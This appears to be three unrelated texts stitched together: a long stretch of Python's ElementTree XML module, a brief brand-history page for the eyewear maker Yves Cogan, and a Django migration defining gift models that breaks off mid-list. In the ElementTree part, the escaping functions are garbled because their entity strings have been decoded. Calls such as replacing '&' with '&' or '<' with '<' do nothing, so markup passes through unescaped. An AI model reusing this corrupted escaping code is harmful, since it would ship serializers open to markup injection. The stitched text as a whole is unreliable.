write(" %s=\"%s\"" % (qnames[k], v))
if text or len(elem) or not short_empty_elements:
write(">")
if text:
write(_escape_cdata(text))
for e in elem:
_serialize_xml(write, e, qnames, None,
short_empty_elements=short_empty_elements)
write("</" + tag + ">")
else:
write(" />")
if elem.tail:
write(_escape_cdata(elem.tail))
HTML_EMPTY = ("area", "base", "basefont", "br", "col", "frame", "hr",
"img", "input", "isindex", "link", "meta", "param")
try:
HTML_EMPTY = set(HTML_EMPTY)
except NameError:
pass
def _serialize_html(write, elem, qnames, namespaces, **kwargs):
tag = elem.tag
text = elem.text
if tag is Comment:
write("<!--%s-->" % _escape_cdata(text))
elif tag is ProcessingInstruction:
write("<?%s?>" % _escape_cdata(text))
else:
tag = qnames[tag]
if tag is None:
if text:
write(_escape_cdata(text))
for e in elem:
_serialize_html(write, e, qnames, None)
else:
write("<" + tag)
items = list(elem.items())
if items or namespaces:
if namespaces:
for v, k in sorted(namespaces.items(),
key=lambda x: x[1]): # sort on prefix
if k:
k = ":" + k
write(" xmlns%s=\"%s\"" % (
k,
_escape_attrib(v)
))
for k, v in items:
if isinstance(k, QName):
k = k.text
if isinstance(v, QName):
v = qnames[v.text]
else:
v = _escape_attrib_html(v)
# FIXME: handle boolean attributes
write(" %s=\"%s\"" % (qnames[k], v))
write(">")
ltag = tag.lower()
if text:
if ltag == "script" or ltag == "style":
write(text)
else:
write(_escape_cdata(text))
for e in elem:
_serialize_html(write, e, qnames, None)
if ltag not in HTML_EMPTY:
write("</" + tag + ">")
if elem.tail:
write(_escape_cdata(elem.tail))
def _serialize_text(write, elem):
for part in elem.itertext():
write(part)
if elem.tail:
write(elem.tail)
_serialize = {
"xml": _serialize_xml,
"html": _serialize_html,
"text": _serialize_text,
# this optional method is imported at the end of the module
# "c14n": _serialize_c14n,
}
def register_namespace(prefix, uri):
"""Register a namespace prefix.
The registry is global, and any existing mapping for either the
given prefix or the namespace URI will be removed.
*prefix* is the namespace prefix, *uri* is a namespace uri. Tags and
attributes in this namespace will be serialized with prefix if possible.
ValueError is raised if prefix is reserved or is invalid.
"""
if re.match(r"ns\d+$", prefix):
raise ValueError("Prefix format reserved for internal use")
for k, v in list(_namespace_map.items()):
if k == uri or v == prefix:
del _namespace_map[k]
_namespace_map[uri] = prefix
_namespace_map = {
# "well-known" namespace prefixes
"http://www.w3.org/XML/1998/namespace": "xml",
"http://www.w3.org/1999/xhtml": "html",
"http://www.w3.org/1999/02/22-rdf-syntax-ns#": "rdf",
"http://schemas.xmlsoap.org/wsdl/": "wsdl",
# xml schema
"http://www.w3.org/2001/XMLSchema": "xs",
"http://www.w3.org/2001/XMLSchema-instance": "xsi",
# dublin core
"http://purl.org/dc/elements/1.1/": "dc",
}
# For tests and troubleshooting
register_namespace._namespace_map = _namespace_map
def _raise_serialization_error(text):
raise TypeError(
"cannot serialize %r (type %s)" % (text, type(text).__name__)
)
def _escape_cdata(text):
# escape character data
try:
# it's worth avoiding do-nothing calls for strings that are
# shorter than 500 characters, or so. assume that's, by far,
# the most common case in most applications.
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib(text):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if "<" in text:
text = text.replace("<", "<")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
# Although section 2.11 of the XML specification states that CR or
# CR LN should be replaced with just LN, it applies only to EOLNs
# which take part of organizing file into lines. Within attributes,
# we are replacing these with entity numbers, so they do not count.
# http://www.w3.org/TR/REC-xml/#sec-line-ends
# The current solution, contained in following six lines, was
# discussed in issue 17582 and 39011.
if "\r" in text:
text = text.replace("\r", " ")
if "\n" in text:
text = text.replace("\n", " ")
if "\t" in text:
text = text.replace("\t", "	")
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib_html(text):
# escape attribute value
try:
if "&" in text:
text = text.replace("&", "&")
if ">" in text:
text = text.replace(">", ">")
if "\"" in text:
text = text.replace("\"", """)
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
# --------------------------------------------------------------------
def tostring(element, encoding=None, method=None, *,
xml_declaration=None, default_namespace=None,
short_empty_elements=True):
"""Generate string representation of XML element.
All subelements are included. If encoding is "unicode", a string
is returned. Otherwise a bytestring is returned.
*element* is an Element instance, *encoding* is an optional output
encoding defaulting to US-ASCII, *method* is an optional output which can
be one of "xml" (default), "html", "text" or "c14n", *default_namespace*
sets the default XML namespace (for "xmlns").
Returns an (optionally) encoded string containing the XML data.
"""
stream = io.StringIO() if encoding == 'unicode' else io.BytesIO()
ElementTree(element).write(stream, encoding,
xml_declaration=xml_declaration,
default_namespace=default_namespace,
method=method,
short_empty_elements=short_empty_elements)
return stream.getvalue()
class _ListDataStream(io.BufferedIOBase):
"""An auxiliary stream accumulating into a list reference."""
def __init__(self, lst):
self.lst = lst
def writable(self):
return True
def seekable(self):
return True
def write(self, b):
self.lst.append(b)
def tell(self):
return len(self.lst)
def tostringlist(element, encoding=None, method=None, *,
xml_declaration=None, default_namespace=None,
short_empty_elements=True):
lst = []
stream = _ListDataStream(lst)
ElementTree(element).write(stream, encoding,
xml_declaration=xml_declaration,
default_namespace=default_namespace,
method=method,
short_empty_elements=short_empty_elements)
return lst
def dump(elem):
"""Write element tree or element structure to sys.stdout.
This function should be used for debugging only.
*elem* is either an ElementTree, or a single Element. The exact output
format is implementation dependent. In this version, it's written as an
ordinary XML file.
"""
# debugging
if not isinstance(elem, ElementTree):
elem = ElementTree(elem)
elem.write(sys.stdout, encoding="unicode")
tail = elem.getroot().tail
if not tail or tail[-1] != "\n":
sys.stdout.write("\n")
def indent(tree, space=" ", level=0):
"""Indent an XML document by inserting newlines and indentation space
after elements.
*tree* is the ElementTree or Element to modify. The (root) element
itself will not be changed, but the tail text of all elements in its
subtree will be adapted.
*space* is the whitespace to insert for each indentation level, two
space characters by default.
*level* is the initial indentation level. Setting this to a higher
value than 0 can be used for indenting subtrees that are more deeply
nested inside of a document.
"""
if isinstance(tree, ElementTree):
tree = tree.getroot()
if level < 0:
raise ValueError(f"Initial indentation level must be >= 0, got {level}")
if not len(tree):
return
# Reduce the memory consumption by reusing indentation strings.
indentations = ["\n" + level * space]
def _indent_children(elem, level):
# Start a new indentation level for the first child.
child_level = level + 1
try:
child_indentation = indentations[child_level]
except IndexError:
child_indentation = indentations[level] + space
indentations.append(child_indentation)
if not elem.text or not elem.text.strip():
elem.text = child_indentation
for child in elem:
if len(child):
_indent_children(child, child_level)
if not child.tail or not child.tail.strip():
child.tail = child_indentation
# Dedent after the last child by overwriting the previous indentation.
if not child.tail.strip():
child.tail = indentations[level]
_indent_children(tree, 0)
# --------------------------------------------------------------------
# parsing
def parse(source, parser=None):
"""Parse XML document into element tree.
*source* is a filename or file object containing XML data,
*parser* is an optional parser instance defaulting to XMLParser.
Return an ElementTree instance.
"""
tree = ElementTree()
tree.parse(source, parser)
return tree
def iterparse(source, events=None, parser=None):
"""Incrementally parse XML document into ElementTree.
This class also reports what's going on to the user based on the
*events* it is initialized with. The supported events are the strings
"start", "end", "start-ns" and "end-ns" (the "ns" events are used to get
detailed namespace information). If *events* is omitted, only
"end" events are reported.
*source* is a filename or file object containing XML data, *events* is
a list of events to report back, *parser* is an optional parser instance.
Returns an iterator providing (event, elem) pairs.
"""
# Use the internal, undocumented _parser argument for now; When the
# parser argument of iterparse is removed, this can be killed.
pullparser = XMLPullParser(events=events, _parser=parser)
def iterator():
try:
while True:
yield from pullparser.read_events()
# load event buffer
data = source.read(16 * 1024)
if not data:
break
pullparser.feed(data)
root = pullparser._close_and_return_root()
yield from pullparser.read_events()
it.root = root
finally:
if close_source:
source.close()
class IterParseIterator(collections.abc.Iterator):
__next__ = iterator().__next__
it = IterParseIterator()
it.root = None
del iterator, IterParseIterator
close_source = False
if not hasattr(source, "read"):
source = open(source, "rb")
close_source = True
return it
class XMLPullParser:
def __init__(self, events=None, *, _parser=None):
# The _parser argument is for internal use only and must not be relied
# upon in user code. It will be removed in a future release.
# See http://bugs.python.org/issue17741 for more details.
self._events_queue = collections.deque()
self._parser = _parser or XMLParser(target=TreeBuilder())
# wire up the parser for event reporting
if events is None:
events = ("end",)
self._parser._setevents(self._events_queue, events)
def feed(self, data):
"""Feed encoded data to parser."""
if self._parser is None:
raise ValueError("feed() called after end of stream")
if data:
try:
self._parser.feed(data)
except SyntaxError as exc:
self._events_queue.append(exc)
def _close_and_return_root(self):
# iterparse needs this to set its root attribute properly :(
root = self._parser.close()
self._parser = None
return root
def close(self):
"""Finish feeding data to parser.
Unlike XMLParser, does not return the root element. Use
read_events() to consume elements from XMLPullParser.
"""
self._close_and_return_root()
def read_events(self):
"""Return an iterator over currently available (event, elem) pairs.
Events are consumed from the internal event queue as they are
retrieved from the iterator.
"""
events = self._events_queue
while events:
event = events.popleft()
if isinstance(event, Exception):
raise event
else:
yield event
def XML(text, parser=None):
"""Parse XML document from string constant.
This function can be used to embed "XML Literals" in Python code.
*text* is a string containing XML data, *parser* is an
optional parser instance, defaulting to the standard XMLParser.
Returns an Element instance.
"""
if not parser:
parser = XMLParser(target=TreeBuilder())
parser.feed(text)
return parser.close()
def XMLID(text, parser=None):
"""Parse XML document from string constant for its IDs.
*text* is a string containing XML data, *parser* is an
optional parser instance, defaulting to the standard XMLParser.
Returns an (Element, dict) tuple, in which the
dict maps element id:s to elements.
"""
if not parser:
parser = XMLParser(target=TreeBuilder())
parser.feed(text)
tree = parser.close()
ids = {}
for elem in tree.iter():
id = elem.get("id")
if id:
ids[id] = elem
return tree, ids
# Parse XML document from string constant. Alias for XML().
fromstring = XML
def fromstringlist(sequence, parser=None):
"""Parse XML document from sequence of string fragments.
*sequence* is a list of other sequence, *parser* is an optional parser
instance, defaulting to the standard XMLParser.
Returns an Element instance.
"""
if not parser:
parser = XMLParser(target=TreeBuilder())
for text in sequence:
parser.feed(text)
return parser.close()
# --------------------------------------------------------------------
class TreeBuilder:
"""Generic element structure builder.
This builder converts a sequence of start, data, and end method
calls to a well-formed element structure.
You can use this class to build an element structure using a custom XML
parser, or a parser for some other XML-like format.
*element_factory* is an optional element factory which is called
to create new Element instances, as necessary.
*comment_factory* is a factory to create comments to be used instead of
the standard factory. If *insert_comments* is false (the default),
comments will not be inserted into the tree.
*pi_factory* is a factory to create processing instructions to be used
instead of the standard factory. If *insert_pis* is false (the default),
processing instructions will not be inserted into the tree.
"""
def __init__(self, element_factory=None, *,
comment_factory=None, pi_factory=None,
insert_comments=False, insert_pis=False):
self._data = [] # data collector
self._elem = [] # element stack
self._last = None # last element
self._root = None # root element
self._tail = None # true if we're after an end tag
if comment_factory is None:
comment_factory = Comment
self._comment_factory = comment_factory
self.insert_comments = insert_comments
if pi_factory is None:
pi_factory = ProcessingInstruction
self._pi_factory = pi_factory
self.insert_pis = insert_pis
if element_factory is None:
element_factory = Element
self._factory = element_factory
def close(self):
"""Flush builder buffers and return toplevel document Element."""
assert len(self._elem) == 0, "missing end tags"
assert self._root is not None, "missing toplevel element"
return self._root
def _flush(self):
if self._data:
if self._last is not None:
text = "".join(self._data)
if self._tail:
assert self._last.tail is None, "internal error (tail)"
self._last.tail = text
else:
assert self._last.text is None, "internal error (text)"
self._last.text = text
self._data = []
def data(self, data):
"""Add text to current element."""
self._data.append(data)
def start(self, tag, attrs):
"""Open new element and return it.
*tag* is the element name, *attrs* is a dict containing element
attributes.
"""
self._flush()
self._last = elem = self._factory(tag, attrs)
if self._elem:
self._elem[-1].append(elem)
elif self._root is None:
self._root = elem
self._elem.append(elem)
self._tail = 0
return elem
def end(self, tag):
"""Close and return current Element.
*tag* is the element name.
"""
self._flush()
self._last = self._elem.pop()
assert self._last.tag == tag,\
"end tag mismatch (expected %s, got %s)" % (
self._last.tag, tag)
self._tail = 1
return self._last
def comment(self, text):
"""Create a comment using the comment_factory.
*text* is the text of the comment.
"""
return self._handle_single(
self._comment_factory, self.insert_comments, text)
def pi(self, target, text=None):
"""Create a processing instruction using the pi_factory.
*target* is the target name of the processing instruction.
*text* is the data of the processing instruction, or ''.
"""
return self._handle_single(
self._pi_factory, self.insert_pis, target, text)
def _handle_single(self, factory, insert, *args):
elem = factory(*args)
if insert:
self._flush()
self._last = elem
if self._elem:
self._elem[-1].append(elem)
self._tail = 1
return elem
# also see ElementTree and TreeBuilder
class XMLParser:
"""Element structure builder for XML source data based on the expat parser.
*target* is an optional target object which defaults to an instance of the
standard TreeBuilder class, *encoding* is an optional encoding string
which if given, overrides the encoding specified in the XML file:
http://www.iana.org/assignments/character-sets
"""
def __init__(self, *, target=None, encoding=None):
try:
from xml.parsers import expat
except ImportError:
try:
import pyexpat as expat
except ImportError:
raise ImportError(
"No module named expat; use SimpleXMLTreeBuilder instead"
)
parser = expat.ParserCreate(encoding, "}")
if target is None:
target = TreeBuilder()
# underscored names are provided for compatibility only
self.parser = self._parser = parser
self.target = self._target = target
self._error = expat.error
self._names = {} # name memo cache
# main callbacks
parser.DefaultHandlerExpand = self._default
if hasattr(target, 'start'):
parser.StartElementHandler = self._start
if hasattr(target, 'end'):
parser.EndElementHandler = self._end
if hasattr(target, 'start_ns'):
parser.StartNamespaceDeclHandler = self._start_ns
if hasattr(target, 'end_ns'):
parser.EndNamespaceDeclHandler = self._end_ns
if hasattr(target, 'data'):
parser.CharacterDataHandler = target.data
# miscellaneous callbacks
if hasattr(target, 'comment'):
parser.CommentHandler = target.comment
if hasattr(target, 'pi'):
parser.ProcessingInstructionHandler = target.pi
# Configure pyexpat: buffering, new-style attribute handling.
parser.buffer_text = 1
parser.ordered_attributes = 1
parser.specified_attributes = 1
self._doctype = None
self.entity = {}
try:
self.version = "Expat %d.%d.%d" % expat.version_info
except AttributeError:
pass # unknown
def _setevents(self, events_queue, events_to_report):
# Internal API for XMLPullParser
# events_to_report: a list of events to report during parsing (same as
# the *events* of XMLPullParser's constructor.
# events_queue: a list of actual parsing events that will be populated
# by the underlying parser.
#
parser = self._parser
append = events_queue.append
for event_name in events_to_report:
if event_name == "start":
parser.ordered_attributes = 1
parser.specified_attributes = 1
def handler(tag, attrib_in, event=event_name, append=append,
start=self._start):
append((event, start(tag, attrib_in)))
parser.StartElementHandler = handler
elif event_name == "end":
def handler(tag, event=event_name, append=append,
end=self._end):
append((event, end(tag)))
parser.EndElementHandler = handler
elif event_name == "start-ns":
# TreeBuilder does not implement .start_ns()
if hasattr(self.target, "start_ns"):
def handler(prefix, uri, event=event_name, append=append,
start_ns=self._start_ns):
append((event, start_ns(prefix, uri)))
else:
def handler(prefix, uri, event=event_name, append=append):
append((event, (prefix or '', uri or '')))
parser.StartNamespaceDeclHandler = handler
elif event_name == "end-ns":
# TreeBuilder does not implement .end_ns()
if hasattr(self.target, "end_ns"):
def handler(prefix, event=event_name, append=append,
end_ns=self._end_ns):
append((event, end_ns(prefix)))
else:
def handler(prefix, event=event_name, append=append):
append((event, None))
parser.EndNamespaceDeclHandler = handler
elif event_name == 'comment':
def handler(text, event=event_name, append=append, self=self):
append((event, self.target.comment(text)))
parser.CommentHandler = handler
elif event_name == 'pi':
def handler(pi_target, data, event=event_name, append=append,
self=self):
append((event, self.target.pi(pi_target, data)))
parser.ProcessingInstructionHandler = handler
else:
raise ValueError("unknown event %r" % event_name)
def _raiseerror(self, value):
err = ParseError(value)
err.code = value.code
err.position = value.lineno, value.offset
raise err
def _fixname(self, key):
# expand qname, and convert name string to ascii, if possible
try:
name = self._names[key]
except KeyError:
name = key
if "}" in name:
name = "{" + name
self._names[key] = name
return name
def _start_ns(self, prefix, uri):
return self.target.start_ns(prefix or '', uri or '')
def _end_ns(self, prefix):
return self.target.end_ns(prefix or '')
def _start(self, tag, attr_list):
# Handler for expat's StartElementHandler. Since ordered_attributes
# is set, the attributes are reported as a list of alternating
# attribute name,value.
fixname = self._fixname
tag = fixname(tag)
attrib = {}
if attr_list:
for i in range(0, len(attr_list), 2):
attrib[fixname(attr_list[i])] = attr_list[i+1]
return self.target.start(tag, attrib)
def _end(self, tag):
return self.target.end(self._fixname(tag))
def _default(self, text):
prefix = text[:1]
if prefix == "&":
# deal with undefined entities
try:
data_handler = self.target.data
except AttributeError:
return
try:
data_handler(self.entity[text[1:-1]])
except KeyError:
from xml.parsers import expat
err = expat.error(
"undefined entity %s: line %d, column %d" %
(text, self.parser.ErrorLineNumber,
self.parser.ErrorColumnNumber)
)
err.code = 11 # XML_ERROR_UNDEFINED_ENTITY
err.lineno = self.parser.ErrorLineNumber
err.offset = self.parser.ErrorColumnNumber
raise err
elif prefix == "<" and text[:9] == "<!DOCTYPE":
self._doctype = [] # inside a doctype declaration
elif self._doctype is not None:
# parse doctype contents
if prefix == ">":
self._doctype = None
return
text = text.strip()
if not text:
return
self._doctype.append(text)
n = len(self._doctype)
if n > 2:
type = self._doctype[1]
if type == "PUBLIC" and n == 4:
name, type, pubid, system = self._doctype
if pubid:
pubid = pubid[1:-1]
elif type == "SYSTEM" and n == 3:
name, type, system = self._doctype
pubid = None
else:
return
if hasattr(self.target, "doctype"):
self.target.doctype(name, pubid, system[1:-1])
elif hasattr(self, "doctype"):
warnings.warn(
"The doctype() method of XMLParser is ignored. "
"Define doctype() method on the TreeBuilder target.",
RuntimeWarning)
self._doctype = None
def feed(self, data):
"""Feed encoded data to parser."""
try:
self.parser.Parse(data, False)
except self._error as v:
self._raiseerror(v)
def close(self):
"""Finish feeding data to parser and return element structure."""
try:
self.parser.Parse(b"", True) # end of data
except self._error as v:
self._raiseerror(v)
try:
close_handler = self.target.close
except AttributeError:
pass
else:
return close_handler()
finally:
# get rid of circular references
del self.parser, self._parser
del self.target, self._target
# --------------------------------------------------------------------
# C14N 2.0
def canonicalize(xml_data=None, *, out=None, from_file=None, **options):
"""Convert XML to its C14N 2.0 serialised form.
If *out* is provided, it must be a file or file-like object that receives
the serialised canonical XML output (text, not bytes) through its ``.write()``
method. To write to a file, open it in text mode with encoding "utf-8".
If *out* is not provided, this function returns the output as text string.
Either *xml_data* (an XML string) or *from_file* (a file path or
file-like object) must be provided as input.
The configuration options are the same as for the ``C14NWriterTarget``.
"""
if xml_data is None and from_file is None:
raise ValueError("Either 'xml_data' or 'from_file' must be provided as input")
sio = None
if out is None:
sio = out = io.StringIO()
parser = XMLParser(target=C14NWriterTarget(out.write, **options))
if xml_data is not None:
parser.feed(xml_data)
parser.close()
elif from_file is not None:
parse(from_file, parser=parser)
return sio.getvalue() if sio is not None else None
_looks_like_prefix_name = re.compile(r'^\w+:\w+$', re.UNICODE).match
class C14NWriterTarget:
"""
Canonicalization writer target for the XMLParser.
Serialises parse events to XML C14N 2.0.
The *write* function is used for writing out the resulting data stream
as text (not bytes). To write to a file, open it in text mode with encoding
"utf-8" and pass its ``.write`` method.
Configuration options:
- *with_comments*: set to true to include comments
- *strip_text*: set to true to strip whitespace before and after text content
- *rewrite_prefixes*: set to true to replace namespace prefixes by "n{number}"
- *qname_aware_tags*: a set of qname aware tag names in which prefixes
should be replaced in text content
- *qname_aware_attrs*: a set of qname aware attribute names in which prefixes
should be replaced in text content
- *exclude_attrs*: a set of attribute names that should not be serialised
- *exclude_tags*: a set of tag names that should not be serialised
"""
def __init__(self, write, *,
with_comments=False, strip_text=False, rewrite_prefixes=False,
qname_aware_tags=None, qname_aware_attrs=None,
exclude_attrs=None, exclude_tags=None):
self._write = write
self._data = []
self._with_comments = with_comments
self._strip_text = strip_text
self._exclude_attrs = set(exclude_attrs) if exclude_attrs else None
self._exclude_tags = set(exclude_tags) if exclude_tags else None
self._rewrite_prefixes = rewrite_prefixes
if qname_aware_tags:
self._qname_aware_tags = set(qname_aware_tags)
else:
self._qname_aware_tags = None
if qname_aware_attrs:
self._find_qname_aware_attrs = set(qname_aware_attrs).intersection
else:
self._find_qname_aware_attrs = None
# Stack with globally and newly declared namespaces as (uri, prefix) pairs.
self._declared_ns_stack = [[
("http://www.w3.org/XML/1998/namespace", "xml"),
]]
# Stack with user declared namespace prefixes as (uri, prefix) pairs.
self._ns_stack = []
if not rewrite_prefixes:
self._ns_stack.append(list(_namespace_map.items()))
self._ns_stack.append([])
self._prefix_map = {}
self._preserve_space = [False]
self._pending_start = None
self._root_seen = False
self._root_done = False
self._ignored_depth = 0
def _iter_namespaces(self, ns_stack, _reversed=reversed):
for namespaces in _reversed(ns_stack):
if namespaces: # almost no element declares new namespaces
yield from namespaces
def _resolve_prefix_name(self, prefixed_name):
prefix, name = prefixed_name.split(':', 1)
for uri, p in self._iter_namespaces(self._ns_stack):
if p == prefix:
return f'{{{uri}}}{name}'
raise ValueError(f'Prefix {prefix} of QName "{prefixed_name}" is not declared in scope')
def _qname(self, qname, uri=None):
if uri is None:
uri, tag = qname[1:].rsplit('}', 1) if qname[:1] == '{' else ('', qname)
else:
tag = qname
prefixes_seen = set()
for u, prefix in self._iter_namespaces(self._declared_ns_stack):
if u == uri and prefix not in prefixes_seen:
return f'{prefix}:{tag}' if prefix else tag, tag, uri
prefixes_seen.add(prefix)
# Not declared yet => add new declaration.
if self._rewrite_prefixes:
if uri in self._prefix_map:
prefix = self._prefix_map[uri]
else:
prefix = self._prefix_map[uri] = f'n{len(self._prefix_map)}'
self._declared_ns_stack[-1].append((uri, prefix))
return f'{prefix}:{tag}', tag, uri
if not uri and '' not in prefixes_seen:
# No default namespace declared => no prefix needed.
return tag, tag, uri
for u, prefix in self._iter_namespaces(self._ns_stack):
if u == uri:
self._declared_ns_stack[-1].append((uri, prefix))
return f'{prefix}:{tag}' if prefix else tag, tag, uri
if not uri:
# As soon as a default namespace is defined,
# anything that has no namespace (and thus, no prefix) goes there.
return tag, tag, uri
raise ValueError(f'Namespace "{uri}" is not declared in scope')
def data(self, data):
if not self._ignored_depth:
self._data.append(data)
def _flush(self, _join_text=''.join):
data = _join_text(self._data)
del self._data[:]
if self._strip_text and not self._preserve_space[-1]:
data = data.strip()
if self._pending_start is not None:
args, self._pending_start = self._pending_start, None
qname_text = data if data and _looks_like_prefix_name(data) else None
self._start(*args, qname_text)
if qname_text is not None:
return
if data and self._root_seen:
self._write(_escape_cdata_c14n(data))
def start_ns(self, prefix, uri):
if self._ignored_depth:
return
# we may have to resolve qnames in text content
if self._data:
self._flush()
self._ns_stack[-1].append((uri, prefix))
def start(self, tag, attrs):
if self._exclude_tags is not None and (
self._ignored_depth or tag in self._exclude_tags):
self._ignored_depth += 1
return
if self._data:
self._flush()
new_namespaces = []
self._declared_ns_stack.append(new_namespaces)
if self._qname_aware_tags is not None and tag in self._qname_aware_tags:
# Need to parse text first to see if it requires a prefix declaration.
self._pending_start = (tag, attrs, new_namespaces)
return
self._start(tag, attrs, new_namespaces)
def _start(self, tag, attrs, new_namespaces, qname_text=None):
if self._exclude_attrs is not None and attrs:
attrs = {k: v for k, v in attrs.items() if k not in self._exclude_attrs}
qnames = {tag, *attrs}
resolved_names = {}
# Resolve prefixes in attribute and tag text.
if qname_text is not None:
qname = resolved_names[qname_text] = self._resolve_prefix_name(qname_text)
qnames.add(qname)
if self._find_qname_aware_attrs is not None and attrs:
qattrs = self._find_qname_aware_attrs(attrs)
if qattrs:
for attr_name in qattrs:
value = attrs[attr_name]
if _looks_like_prefix_name(value):
qname = resolved_names[value] = self._resolve_prefix_name(value)
qnames.add(qname)
else:
qattrs = None
else:
qattrs = None
# Assign prefixes in lexicographical order of used URIs.
parse_qname = self._qname
parsed_qnames = {n: parse_qname(n) for n in sorted(
qnames, key=lambda n: n.split('}', 1))}
# Write namespace declarations in prefix order ...
if new_namespaces:
attr_list = [
('xmlns:' + prefix if prefix else 'xmlns', uri)
for uri, prefix in new_namespaces
]
attr_list.sort()
else:
# almost always empty
attr_list = []
# ... followed by attributes in URI+name order
if attrs:
for k, v in sorted(attrs.items()):
if qattrs is not None and k in qattrs and v in resolved_names:
v = parsed_qnames[resolved_names[v]][0]
attr_qname, attr_name, uri = parsed_qnames[k]
# No prefix for attributes in default ('') namespace.
attr_list.append((attr_qname if uri else attr_name, v))
# Honour xml:space attributes.
space_behaviour = attrs.get('{http://www.w3.org/XML/1998/namespace}space')
self._preserve_space.append(
space_behaviour == 'preserve' if space_behaviour
else self._preserve_space[-1])
# Write the tag.
write = self._write
write('<' + parsed_qnames[tag][0])
if attr_list:
write(''.join([f' {k}="{_escape_attrib_c14n(v)}"' for k, v in attr_list]))
write('>')
# Write the resolved qname text content.
if qname_text is not None:
write(_escape_cdata_c14n(parsed_qnames[resolved_names[qname_text]][0]))
self._root_seen = True
self._ns_stack.append([])
def end(self, tag):
if self._ignored_depth:
self._ignored_depth -= 1
return
if self._data:
self._flush()
self._write(f'</{self._qname(tag)[0]}>')
self._preserve_space.pop()
self._root_done = len(self._preserve_space) == 1
self._declared_ns_stack.pop()
self._ns_stack.pop()
def comment(self, text):
if not self._with_comments:
return
if self._ignored_depth:
return
if self._root_done:
self._write('\n')
elif self._root_seen and self._data:
self._flush()
self._write(f'<!--{_escape_cdata_c14n(text)}-->')
if not self._root_seen:
self._write('\n')
def pi(self, target, data):
if self._ignored_depth:
return
if self._root_done:
self._write('\n')
elif self._root_seen and self._data:
self._flush()
self._write(
f'<?{target} {_escape_cdata_c14n(data)}?>' if data else f'<?{target}?>')
if not self._root_seen:
self._write('\n')
def _escape_cdata_c14n(text):
# escape character data
try:
# it's worth avoiding do-nothing calls for strings that are
# shorter than 500 character, or so. assume that's, by far,
# the most common case in most applications.
if '&' in text:
text = text.replace('&', '&')
if '<' in text:
text = text.replace('<', '<')
if '>' in text:
text = text.replace('>', '>')
if '\r' in text:
text = text.replace('\r', '
')
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
def _escape_attrib_c14n(text):
# escape attribute value
try:
if '&' in text:
text = text.replace('&', '&')
if '<' in text:
text = text.replace('<', '<')
if '"' in text:
text = text.replace('"', '"')
if '\t' in text:
text = text.replace('\t', '	')
if '\n' in text:
text = text.replace('\n', '
')
if '\r' in text:
text = text.replace('\r', '
')
return text
except (TypeError, AttributeError):
_raise_serialization_error(text)
# --------------------------------------------------------------------
# Import the C accelerators
try:
# Element is going to be shadowed by the C implementation. We need to keep
# the Python version of it accessible for some "creative" by external code
# (see tests)
_Element_Py = Element
# Element, SubElement, ParseError, TreeBuilder, XMLParser, _set_factories
from _elementtree import *
from _elementtree import _set_factories
except ImportError:
pass
else:
_set_factories(Comment, ProcessingInstruction)
|
'A STORY OF A TRAVELLER' is the new artistic brand direction based on the taste of the founder for travelling around the world. Our storytelling follows 5 years of his travel diary from Europe to all continents. First destinations are Canada and Greece (2018/2019) then Japan and India (2019/2020) for our optical and sun collection inspirations.
Thanks to the heritage of Yves Cogan's work, we are creative, imaginative and proud to be French. We have a tailor made approach for producing and assembling together a full range of high quality components. Yves Cogan Brand is the showcase of the French know-how through Made in France process. We pay attention to every single detail. Our values are : Imagination, French Excellence in Design and Craftsmanship.
Mr. Yves Cogan founded his company in 1994 and developed it through his collections Yves Cogan (1997) and Cogan (2004). We have been present in France and worldwide since 1994.
I decided to launch my onw brand Yves Cogan.
My garage was renovated into a small office overlooking the garden.
Ten years later, my company moved to a new brand headoffice in Jura, the heart of the French Eyewear Heritage. "
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import audit_log.models.fields
import ananta.models
import model_utils.fields
from django.conf import settings
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('contacts', '0012_person_note'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Gift',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, verbose_name='ID', auto_created=True)),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
('created_with_session_key', audit_log.models.fields.CreatingSessionKeyField(null=True, editable=False, max_length=40)),
('modified_with_session_key', audit_log.models.fields.LastSessionKeyField(null=True, editable=False, max_length=40)),
('name', models.CharField(help_text='Enter gift name.', max_length=100)),
('description', models.TextField(blank=True)),
('created_by', audit_log.models.fields.CreatingUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='created_gifts_gift_set', editable=False, verbose_name='created by')),
('modified_by', audit_log.models.fields.LastUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='modified_gifts_gift_set', editable=False, verbose_name='modified by')),
],
options={
'abstract': False,
},
bases=(ananta.models.NextPrevMixin, models.Model),
),
migrations.CreateModel(
name='GiftGiven',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, verbose_name='ID', auto_created=True)),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False)),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False)),
('created_with_session_key', audit_log.models.fields.CreatingSessionKeyField(null=True, editable=False, max_length=40)),
('modified_with_session_key', audit_log.models.fields.LastSessionKeyField(null=True, editable=False, max_length=40)),
('status', model_utils.fields.StatusField(choices=[('sent', 'Sent'), ('returned', 'Returned'), ('delivered', 'Delivered')], default='sent', no_check_for_status=True, max_length=100)),
('status_changed', model_utils.fields.MonitorField(default=django.utils.timezone.now, monitor='status')),
('note', models.TextField(verbose_name='Note', blank=True)),
('created_by', audit_log.models.fields.CreatingUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='created_gifts_giftgiven_set', editable=False, verbose_name='created by')),
('gift', models.ForeignKey(to='gifts.Gift', related_name='gifts', verbose_name='Gift')),
('modified_by', audit_log.models.fields.LastUserField(null=True, to=settings.AUTH_USER_MODEL, related_name='modified_gifts_giftgiven_set', editable=False, verbose_name='modified by')),
